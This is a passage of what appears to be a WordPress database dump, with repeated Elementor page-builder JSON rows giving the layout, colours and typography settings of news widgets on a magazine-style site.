":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1349,474,'_elementor_version','0.4'),(1350,475,'_elementor_edit_mode','builder'),(1351,475,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1352,475,'_elementor_version','0.4'),(1353,476,'_elementor_edit_mode','builder'),(1354,476,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"u